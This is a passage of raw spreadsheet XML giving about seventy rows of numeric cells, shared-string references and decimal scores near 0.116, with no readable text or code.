      <c r="E26338" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26338" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="26339" ht="15.75" customHeight="1">
      <c r="A26339" s="1">
        <v>7817.0</v>
      </c>
      <c r="B26339" s="2">
        <v>5.2276816E7</v>
      </c>
      <c r="C26339" s="2" t="s">
        <v>25326</v>
      </c>
      <c r="D26339" s="2">
        <v>1.0</v>
      </c>
      <c r="E26339" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26339" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="26340" ht="15.75" customHeight="1">
      <c r="A26340" s="1">
        <v>7928.0</v>
      </c>
      <c r="B26340" s="2">
        <v>5.2576883E7</v>
      </c>
      <c r="C26340" s="2" t="s">
        <v>25327</v>
      </c>
      <c r="D26340" s="2">
        <v>1.0</v>
      </c>
      <c r="E26340" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26340" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="26341" ht="15.75" customHeight="1">
      <c r="A26341" s="1">
        <v>8330.0</v>
      </c>
      <c r="B26341" s="2">
        <v>5.3658028E7</v>
      </c>
      <c r="C26341" s="2" t="s">
        <v>25328</v>
      </c>
      <c r="D26341" s="2">
        <v>1.0</v>
      </c>
      <c r="E26341" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26341" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="26342" ht="15.75" customHeight="1">
      <c r="A26342" s="1">
        <v>8990.0</v>
      </c>
      <c r="B26342" s="2">
        <v>5.4962246E7</v>
      </c>
      <c r="C26342" s="2" t="s">
        <v>25329</v>
      </c>
      <c r="D26342" s="2">
        <v>1.0</v>
      </c>
      <c r="E26342" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26342" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="26343" ht="15.75" customHeight="1">
      <c r="A26343" s="1">
        <v>9891.0</v>
      </c>
      <c r="B26343" s="2">
        <v>5.6762819E7</v>
      </c>
      <c r="C26343" s="2" t="s">
        <v>25330</v>
      </c>
      <c r="D26343" s="2">
        <v>1.0</v>
      </c>
      <c r="E26343" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26343" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="26344" ht="15.75" customHeight="1">
      <c r="A26344" s="1">
        <v>11054.0</v>
      </c>
      <c r="B26344" s="2">
        <v>1.8177902E7</v>
      </c>
      <c r="C26344" s="2" t="s">
        <v>25331</v>
      </c>
      <c r="D26344" s="2">
        <v>1.0</v>
      </c>
      <c r="E26344" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26344" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="26345" ht="15.75" customHeight="1">
      <c r="A26345" s="1">
        <v>11687.0</v>
      </c>
      <c r="B26345" s="2">
        <v>2.3447561E7</v>
      </c>
      <c r="C26345" s="2" t="s">
        <v>25332</v>
      </c>
      <c r="D26345" s="2">
        <v>1.0</v>
      </c>
      <c r="E26345" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26345" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="26346" ht="15.75" customHeight="1">
      <c r="A26346" s="1">
        <v>11932.0</v>
      </c>
      <c r="B26346" s="2">
        <v>2.5449694E7</v>
      </c>
      <c r="C26346" s="2" t="s">
        <v>25333</v>
      </c>
      <c r="D26346" s="2">
        <v>1.0</v>
      </c>
      <c r="E26346" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26346" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="26347" ht="15.75" customHeight="1">
      <c r="A26347" s="1">
        <v>12382.0</v>
      </c>
      <c r="B26347" s="2">
        <v>2.8841007E7</v>
      </c>
      <c r="C26347" s="2" t="s">
        <v>25334</v>
      </c>
      <c r="D26347" s="2">
        <v>1.0</v>
      </c>
      <c r="E26347" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26347" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="26348" ht="15.75" customHeight="1">
      <c r="A26348" s="1">
        <v>15870.0</v>
      </c>
      <c r="B26348" s="2">
        <v>4.4501107E7</v>
      </c>
      <c r="C26348" s="2" t="s">
        <v>25335</v>
      </c>
      <c r="D26348" s="2">
        <v>1.0</v>
      </c>
      <c r="E26348" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26348" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="26349" ht="15.75" customHeight="1">
      <c r="A26349" s="1">
        <v>16021.0</v>
      </c>
      <c r="B26349" s="2">
        <v>4.5040834E7</v>
      </c>
      <c r="C26349" s="2" t="s">
        <v>25336</v>
      </c>
      <c r="D26349" s="2">
        <v>1.0</v>
      </c>
      <c r="E26349" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26349" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="26350" ht="15.75" customHeight="1">
      <c r="A26350" s="1">
        <v>17612.0</v>
      </c>
      <c r="B26350" s="2">
        <v>5.0360815E7</v>
      </c>
      <c r="C26350" s="2" t="s">
        <v>25337</v>
      </c>
      <c r="D26350" s="2">
        <v>1.0</v>
      </c>
      <c r="E26350" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26350" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="26351" ht="15.75" customHeight="1">
      <c r="A26351" s="1">
        <v>17986.0</v>
      </c>
      <c r="B26351" s="2">
        <v>5.1392529E7</v>
      </c>
      <c r="C26351" s="2" t="s">
        <v>25338</v>
      </c>
      <c r="D26351" s="2">
        <v>1.0</v>
      </c>
      <c r="E26351" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26351" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="26352" ht="15.75" customHeight="1">
      <c r="A26352" s="1">
        <v>18667.0</v>
      </c>
      <c r="B26352" s="2">
        <v>5.3536743E7</v>
      </c>
      <c r="C26352" s="2" t="s">
        <v>25339</v>
      </c>
      <c r="D26352" s="2">
        <v>1.0</v>
      </c>
      <c r="E26352" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26352" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="26353" ht="15.75" customHeight="1">
      <c r="A26353" s="1">
        <v>18695.0</v>
      </c>
      <c r="B26353" s="2">
        <v>5.3602175E7</v>
      </c>
      <c r="C26353" s="2" t="s">
        <v>25340</v>
      </c>
      <c r="D26353" s="2">
        <v>1.0</v>
      </c>
      <c r="E26353" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26353" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="26354" ht="15.75" customHeight="1">
      <c r="A26354" s="1">
        <v>20173.0</v>
      </c>
      <c r="B26354" s="2">
        <v>1.0422609E7</v>
      </c>
      <c r="C26354" s="2" t="s">
        <v>25341</v>
      </c>
      <c r="D26354" s="2">
        <v>1.0</v>
      </c>
      <c r="E26354" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26354" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="26355" ht="15.75" customHeight="1">
      <c r="A26355" s="1">
        <v>20243.0</v>
      </c>
      <c r="B26355" s="2">
        <v>1.093334E7</v>
      </c>
      <c r="C26355" s="2" t="s">
        <v>25342</v>
      </c>
      <c r="D26355" s="2">
        <v>1.0</v>
      </c>
      <c r="E26355" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26355" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="26356" ht="15.75" customHeight="1">
      <c r="A26356" s="1">
        <v>20640.0</v>
      </c>
      <c r="B26356" s="2">
        <v>1.4192392E7</v>
      </c>
      <c r="C26356" s="2" t="s">
        <v>25343</v>
      </c>
      <c r="D26356" s="2">
        <v>1.0</v>
      </c>
      <c r="E26356" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26356" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="26357" ht="15.75" customHeight="1">
      <c r="A26357" s="1">
        <v>20709.0</v>
      </c>
      <c r="B26357" s="2">
        <v>1.4564602E7</v>
      </c>
      <c r="C26357" s="2" t="s">
        <v>25344</v>
      </c>
      <c r="D26357" s="2">
        <v>1.0</v>
      </c>
      <c r="E26357" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26357" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="26358" ht="15.75" customHeight="1">
      <c r="A26358" s="1">
        <v>20892.0</v>
      </c>
      <c r="B26358" s="2">
        <v>1.6210205E7</v>
      </c>
      <c r="C26358" s="2" t="s">
        <v>25345</v>
      </c>
      <c r="D26358" s="2">
        <v>1.0</v>
      </c>
      <c r="E26358" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26358" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="26359" ht="15.75" customHeight="1">
      <c r="A26359" s="1">
        <v>21101.0</v>
      </c>
      <c r="B26359" s="2">
        <v>1.8129162E7</v>
      </c>
      <c r="C26359" s="2" t="s">
        <v>25346</v>
      </c>
      <c r="D26359" s="2">
        <v>1.0</v>
      </c>
      <c r="E26359" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26359" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="26360" ht="15.75" customHeight="1">
      <c r="A26360" s="1">
        <v>21492.0</v>
      </c>
      <c r="B26360" s="2">
        <v>2.3061029E7</v>
      </c>
      <c r="C26360" s="2" t="s">
        <v>25347</v>
      </c>
      <c r="D26360" s="2">
        <v>1.0</v>
      </c>
      <c r="E26360" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26360" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="26361" ht="15.75" customHeight="1">
      <c r="A26361" s="1">
        <v>21563.0</v>
      </c>
      <c r="B26361" s="2">
        <v>2.3709252E7</v>
      </c>
      <c r="C26361" s="2" t="s">
        <v>25348</v>
      </c>
      <c r="D26361" s="2">
        <v>1.0</v>
      </c>
      <c r="E26361" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26361" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="26362" ht="15.75" customHeight="1">
      <c r="A26362" s="1">
        <v>21584.0</v>
      </c>
      <c r="B26362" s="2">
        <v>2.3888898E7</v>
      </c>
      <c r="C26362" s="2" t="s">
        <v>25349</v>
      </c>
      <c r="D26362" s="2">
        <v>1.0</v>
      </c>
      <c r="E26362" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26362" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="26363" ht="15.75" customHeight="1">
      <c r="A26363" s="1">
        <v>21825.0</v>
      </c>
      <c r="B26363" s="2">
        <v>2.6955478E7</v>
      </c>
      <c r="C26363" s="2" t="s">
        <v>25350</v>
      </c>
      <c r="D26363" s="2">
        <v>1.0</v>
      </c>
      <c r="E26363" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26363" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="26364" ht="15.75" customHeight="1">
      <c r="A26364" s="1">
        <v>22095.0</v>
      </c>
      <c r="B26364" s="2">
        <v>3.0788298E7</v>
      </c>
      <c r="C26364" s="2" t="s">
        <v>25351</v>
      </c>
      <c r="D26364" s="2">
        <v>1.0</v>
      </c>
      <c r="E26364" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26364" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="26365" ht="15.75" customHeight="1">
      <c r="A26365" s="1">
        <v>22770.0</v>
      </c>
      <c r="B26365" s="2">
        <v>4.4913896E7</v>
      </c>
      <c r="C26365" s="2" t="s">
        <v>25352</v>
      </c>
      <c r="D26365" s="2">
        <v>1.0</v>
      </c>
      <c r="E26365" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26365" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="26366" ht="15.75" customHeight="1">
      <c r="A26366" s="1">
        <v>22909.0</v>
      </c>
      <c r="B26366" s="2">
        <v>4.8188945E7</v>
      </c>
      <c r="C26366" s="2" t="s">
        <v>25353</v>
      </c>
      <c r="D26366" s="2">
        <v>1.0</v>
      </c>
      <c r="E26366" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26366" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="26367" ht="15.75" customHeight="1">
      <c r="A26367" s="1">
        <v>23346.0</v>
      </c>
      <c r="B26367" s="2">
        <v>5.4770423E7</v>
      </c>
      <c r="C26367" s="2" t="s">
        <v>25354</v>
      </c>
      <c r="D26367" s="2">
        <v>1.0</v>
      </c>
      <c r="E26367" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26367" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="26368" ht="15.75" customHeight="1">
      <c r="A26368" s="1">
        <v>24741.0</v>
      </c>
      <c r="B26368" s="2">
        <v>1.1790629E7</v>
      </c>
      <c r="C26368" s="2" t="s">
        <v>25355</v>
      </c>
      <c r="D26368" s="2">
        <v>1.0</v>
      </c>
      <c r="E26368" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26368" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="26369" ht="15.75" customHeight="1">
      <c r="A26369" s="1">
        <v>24755.0</v>
      </c>
      <c r="B26369" s="2">
        <v>1.1816198E7</v>
      </c>
      <c r="C26369" s="2" t="s">
        <v>25356</v>
      </c>
      <c r="D26369" s="2">
        <v>1.0</v>
      </c>
      <c r="E26369" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26369" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="26370" ht="15.75" customHeight="1">
      <c r="A26370" s="1">
        <v>25085.0</v>
      </c>
      <c r="B26370" s="2">
        <v>1.28818E7</v>
      </c>
      <c r="C26370" s="2" t="s">
        <v>25357</v>
      </c>
      <c r="D26370" s="2">
        <v>1.0</v>
      </c>
      <c r="E26370" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26370" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="26371" ht="15.75" customHeight="1">
      <c r="A26371" s="1">
        <v>25697.0</v>
      </c>
      <c r="B26371" s="2">
        <v>1.4528815E7</v>
      </c>
      <c r="C26371" s="2" t="s">
        <v>25358</v>
      </c>
      <c r="D26371" s="2">
        <v>1.0</v>
      </c>
      <c r="E26371" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26371" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="26372" ht="15.75" customHeight="1">
      <c r="A26372" s="1">
        <v>26987.0</v>
      </c>
      <c r="B26372" s="2">
        <v>1.9756104E7</v>
      </c>
      <c r="C26372" s="2" t="s">
        <v>25359</v>
      </c>
      <c r="D26372" s="2">
        <v>1.0</v>
      </c>
      <c r="E26372" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26372" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="26373" ht="15.75" customHeight="1">
      <c r="A26373" s="1">
        <v>27235.0</v>
      </c>
      <c r="B26373" s="2">
        <v>2.1047142E7</v>
      </c>
      <c r="C26373" s="2" t="s">
        <v>25360</v>
      </c>
      <c r="D26373" s="2">
        <v>1.0</v>
      </c>
      <c r="E26373" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26373" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="26374" ht="15.75" customHeight="1">
      <c r="A26374" s="1">
        <v>27906.0</v>
      </c>
      <c r="B26374" s="2">
        <v>2.3709251E7</v>
      </c>
      <c r="C26374" s="2" t="s">
        <v>25348</v>
      </c>
      <c r="D26374" s="2">
        <v>1.0</v>
      </c>
      <c r="E26374" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26374" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="26375" ht="15.75" customHeight="1">
      <c r="A26375" s="1">
        <v>27956.0</v>
      </c>
      <c r="B26375" s="2">
        <v>2.3888897E7</v>
      </c>
      <c r="C26375" s="2" t="s">
        <v>25349</v>
      </c>
      <c r="D26375" s="2">
        <v>1.0</v>
      </c>
      <c r="E26375" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26375" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="26376" ht="15.75" customHeight="1">
      <c r="A26376" s="1">
        <v>28133.0</v>
      </c>
      <c r="B26376" s="2">
        <v>2.4749434E7</v>
      </c>
      <c r="C26376" s="2" t="s">
        <v>25361</v>
      </c>
      <c r="D26376" s="2">
        <v>1.0</v>
      </c>
      <c r="E26376" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26376" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="26377" ht="15.75" customHeight="1">
      <c r="A26377" s="1">
        <v>28589.0</v>
      </c>
      <c r="B26377" s="2">
        <v>2.6955477E7</v>
      </c>
      <c r="C26377" s="2" t="s">
        <v>25350</v>
      </c>
      <c r="D26377" s="2">
        <v>1.0</v>
      </c>
      <c r="E26377" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26377" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="26378" ht="15.75" customHeight="1">
      <c r="A26378" s="1">
        <v>28734.0</v>
      </c>
      <c r="B26378" s="2">
        <v>2.7993642E7</v>
      </c>
      <c r="C26378" s="2" t="s">
        <v>25362</v>
      </c>
      <c r="D26378" s="2">
        <v>1.0</v>
      </c>
      <c r="E26378" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26378" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="26379" ht="15.75" customHeight="1">
      <c r="A26379" s="1">
        <v>28971.0</v>
      </c>
      <c r="B26379" s="2">
        <v>2.9812644E7</v>
      </c>
      <c r="C26379" s="2" t="s">
        <v>25363</v>
      </c>
      <c r="D26379" s="2">
        <v>1.0</v>
      </c>
      <c r="E26379" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26379" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="26380" ht="15.75" customHeight="1">
      <c r="A26380" s="1">
        <v>29203.0</v>
      </c>
      <c r="B26380" s="2">
        <v>3.0766178E7</v>
      </c>
      <c r="C26380" s="2" t="s">
        <v>25364</v>
      </c>
      <c r="D26380" s="2">
        <v>1.0</v>
      </c>
      <c r="E26380" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26380" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="26381" ht="15.75" customHeight="1">
      <c r="A26381" s="1">
        <v>29712.0</v>
      </c>
      <c r="B26381" s="2">
        <v>3.4377877E7</v>
      </c>
      <c r="C26381" s="2" t="s">
        <v>25365</v>
      </c>
      <c r="D26381" s="2">
        <v>1.0</v>
      </c>
      <c r="E26381" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26381" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="26382" ht="15.75" customHeight="1">
      <c r="A26382" s="1">
        <v>31269.0</v>
      </c>
      <c r="B26382" s="2">
        <v>4942565.0</v>
      </c>
      <c r="C26382" s="2" t="s">
        <v>25366</v>
      </c>
      <c r="D26382" s="2">
        <v>1.0</v>
      </c>
      <c r="E26382" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26382" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="26383" ht="15.75" customHeight="1">
      <c r="A26383" s="1">
        <v>31427.0</v>
      </c>
      <c r="B26383" s="2">
        <v>5.0134747E7</v>
      </c>
      <c r="C26383" s="2" t="s">
        <v>25367</v>
      </c>
      <c r="D26383" s="2">
        <v>1.0</v>
      </c>
      <c r="E26383" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26383" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="26384" ht="15.75" customHeight="1">
      <c r="A26384" s="1">
        <v>31635.0</v>
      </c>
      <c r="B26384" s="2">
        <v>5146881.0</v>
      </c>
      <c r="C26384" s="2" t="s">
        <v>25368</v>
      </c>
      <c r="D26384" s="2">
        <v>1.0</v>
      </c>
      <c r="E26384" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26384" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="26385" ht="15.75" customHeight="1">
      <c r="A26385" s="1">
        <v>32130.0</v>
      </c>
      <c r="B26385" s="2">
        <v>5.4124275E7</v>
      </c>
      <c r="C26385" s="2" t="s">
        <v>25369</v>
      </c>
      <c r="D26385" s="2">
        <v>1.0</v>
      </c>
      <c r="E26385" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26385" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="26386" ht="15.75" customHeight="1">
      <c r="A26386" s="1">
        <v>32840.0</v>
      </c>
      <c r="B26386" s="2">
        <v>6242244.0</v>
      </c>
      <c r="C26386" s="2" t="s">
        <v>25370</v>
      </c>
      <c r="D26386" s="2">
        <v>1.0</v>
      </c>
      <c r="E26386" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26386" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="26387" ht="15.75" customHeight="1">
      <c r="A26387" s="1">
        <v>33483.0</v>
      </c>
      <c r="B26387" s="2">
        <v>7997737.0</v>
      </c>
      <c r="C26387" s="2" t="s">
        <v>25368</v>
      </c>
      <c r="D26387" s="2">
        <v>1.0</v>
      </c>
      <c r="E26387" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26387" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="26388" ht="15.75" customHeight="1">
      <c r="A26388" s="1">
        <v>2763.0</v>
      </c>
      <c r="B26388" s="2">
        <v>3.5106904E7</v>
      </c>
      <c r="C26388" s="2" t="s">
        <v>25371</v>
      </c>
      <c r="D26388" s="2">
        <v>1.0</v>
      </c>
      <c r="E26388" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26388" s="2">
        <v>0.1162551440329218</v>
      </c>
    </row>
    <row r="26389" ht="15.75" customHeight="1">
      <c r="A26389" s="1">
        <v>8946.0</v>
      </c>
      <c r="B26389" s="2">
        <v>5.4905328E7</v>
      </c>
      <c r="C26389" s="2" t="s">
        <v>25372</v>
      </c>
      <c r="D26389" s="2">
        <v>1.0</v>
      </c>
      <c r="E26389" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26389" s="2">
        <v>0.1162551440329218</v>
      </c>
    </row>
    <row r="26390" ht="15.75" customHeight="1">
      <c r="A26390" s="1">
        <v>10148.0</v>
      </c>
      <c r="B26390" s="2">
        <v>5.7309657E7</v>
      </c>
      <c r="C26390" s="2" t="s">
        <v>25373</v>
      </c>
      <c r="D26390" s="2">
        <v>1.0</v>
      </c>
      <c r="E26390" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26390" s="2">
        <v>0.1162551440329218</v>
      </c>
    </row>
    <row r="26391" ht="15.75" customHeight="1">
      <c r="A26391" s="1">
        <v>31348.0</v>
      </c>
      <c r="B26391" s="2">
        <v>4.9842316E7</v>
      </c>
      <c r="C26391" s="2" t="s">
        <v>25374</v>
      </c>
      <c r="D26391" s="2">
        <v>1.0</v>
      </c>
      <c r="E26391" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26391" s="2">
        <v>0.1162551440329218</v>
      </c>
    </row>
    <row r="26392" ht="15.75" customHeight="1">
      <c r="A26392" s="1">
        <v>32679.0</v>
      </c>
      <c r="B26392" s="2">
        <v>5942495.0</v>
      </c>
      <c r="C26392" s="2" t="s">
        <v>25375</v>
      </c>
      <c r="D26392" s="2">
        <v>1.0</v>
      </c>
      <c r="E26392" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26392" s="2">
        <v>0.1162551440329218</v>
      </c>
    </row>
    <row r="26393" ht="15.75" customHeight="1">
      <c r="A26393" s="1">
        <v>8656.0</v>
      </c>
      <c r="B26393" s="2">
        <v>5.4353711E7</v>
      </c>
      <c r="C26393" s="2" t="s">
        <v>25376</v>
      </c>
      <c r="D26393" s="2">
        <v>1.0</v>
      </c>
      <c r="E26393" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26393" s="2">
        <v>0.1161616161616161</v>
      </c>
    </row>
    <row r="26394" ht="15.75" customHeight="1">
      <c r="A26394" s="1">
        <v>18926.0</v>
      </c>
      <c r="B26394" s="2">
        <v>5.4244049E7</v>
      </c>
      <c r="C26394" s="2" t="s">
        <v>25377</v>
      </c>
      <c r="D26394" s="2">
        <v>1.0</v>
      </c>
      <c r="E26394" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26394" s="2">
        <v>0.1161616161616161</v>
      </c>
    </row>
    <row r="26395" ht="15.75" customHeight="1">
      <c r="A26395" s="1">
        <v>22780.0</v>
      </c>
      <c r="B26395" s="2">
        <v>4.5244334E7</v>
      </c>
      <c r="C26395" s="2" t="s">
        <v>25378</v>
      </c>
      <c r="D26395" s="2">
        <v>1.0</v>
      </c>
      <c r="E26395" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26395" s="2">
        <v>0.1161616161616161</v>
      </c>
    </row>
    <row r="26396" ht="15.75" customHeight="1">
      <c r="A26396" s="1">
        <v>10692.0</v>
      </c>
      <c r="B26396" s="2">
        <v>1.4759018E7</v>
      </c>
      <c r="C26396" s="2" t="s">
        <v>25379</v>
      </c>
      <c r="D26396" s="2">
        <v>1.0</v>
      </c>
      <c r="E26396" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26396" s="2">
        <v>0.1160714285714286</v>
      </c>
    </row>
    <row r="26397" ht="15.75" customHeight="1">
      <c r="A26397" s="1">
        <v>17298.0</v>
      </c>
      <c r="B26397" s="2">
        <v>4.9261421E7</v>
      </c>
      <c r="C26397" s="2" t="s">
        <v>25380</v>
      </c>
      <c r="D26397" s="2">
        <v>1.0</v>
      </c>
      <c r="E26397" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26397" s="2">
        <v>0.1160714285714286</v>
      </c>
    </row>
    <row r="26398" ht="15.75" customHeight="1">
      <c r="A26398" s="1">
        <v>27992.0</v>
      </c>
      <c r="B26398" s="2">
        <v>2.4192562E7</v>
      </c>
      <c r="C26398" s="2" t="s">
        <v>25381</v>
      </c>
      <c r="D26398" s="2">
        <v>1.0</v>
      </c>
      <c r="E26398" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26398" s="2">
        <v>0.1160714285714286</v>
      </c>
    </row>
    <row r="26399" ht="15.75" customHeight="1">
      <c r="A26399" s="1">
        <v>20639.0</v>
      </c>
      <c r="B26399" s="2">
        <v>1.4192392E7</v>
      </c>
      <c r="C26399" s="2" t="s">
        <v>25382</v>
      </c>
      <c r="D26399" s="2">
        <v>1.0</v>
      </c>
      <c r="E26399" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26399" s="2">
        <v>0.1160714285714285</v>
      </c>
    </row>
    <row r="26400" ht="15.75" customHeight="1">
      <c r="A26400" s="1">
        <v>930.0</v>
      </c>
      <c r="B26400" s="2">
        <v>2.2358608E7</v>
      </c>
      <c r="C26400" s="2" t="s">
        <v>25383</v>
      </c>
      <c r="D26400" s="2">
        <v>1.0</v>
      </c>
      <c r="E26400" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26400" s="2">
        <v>0.1159844054580897</v>
      </c>
    </row>
    <row r="26401" ht="15.75" customHeight="1">
      <c r="A26401" s="1">
        <v>11743.0</v>
      </c>
      <c r="B26401" s="2">
        <v>2.405194E7</v>
      </c>
      <c r="C26401" s="2" t="s">
        <v>25384</v>
      </c>
      <c r="D26401" s="2">
        <v>1.0</v>
      </c>
      <c r="E26401" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26401" s="2">
        <v>0.1159844054580897</v>
      </c>
    </row>
    <row r="26402" ht="15.75" customHeight="1">
      <c r="A26402" s="1">
        <v>15785.0</v>
      </c>
      <c r="B26402" s="2">
        <v>4.4199813E7</v>
      </c>
      <c r="C26402" s="2" t="s">
        <v>25385</v>
      </c>
      <c r="D26402" s="2">
        <v>1.0</v>
      </c>
      <c r="E26402" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26402" s="2">
        <v>0.1159844054580897</v>
      </c>
    </row>
    <row r="26403" ht="15.75" customHeight="1">
      <c r="A26403" s="1">
        <v>26238.0</v>
      </c>
      <c r="B26403" s="2">
        <v>1.6282675E7</v>
      </c>
      <c r="C26403" s="2" t="s">
        <v>25386</v>
      </c>
      <c r="D26403" s="2">
        <v>1.0</v>
      </c>
      <c r="E26403" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26403" s="2">
        <v>0.1159844054580897</v>
      </c>
    </row>
    <row r="26404" ht="15.75" customHeight="1">
      <c r="A26404" s="1">
        <v>31636.0</v>
      </c>
      <c r="B26404" s="2">
        <v>5146881.0</v>
      </c>
      <c r="C26404" s="2" t="s">
        <v>25387</v>
      </c>
      <c r="D26404" s="2">
        <v>1.0</v>
      </c>
      <c r="E26404" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F26404" s="2">
        <v>0.1159844054580897</v>
      </c>
    </row>
    <row r="26405" ht="15.75" customHeight="1">
      <c r="A26405" s="1">
        <v>8342.0</v>
      </c>
      <c r="B26405" s="2">
        <v>5.3715638E7</v>
      </c>
      <c r="C26405" s="2" t="s">
        <v>25388</v>
      </c>
      <c r="D26405" s="2">
        <v>1.0</v>
      </c>
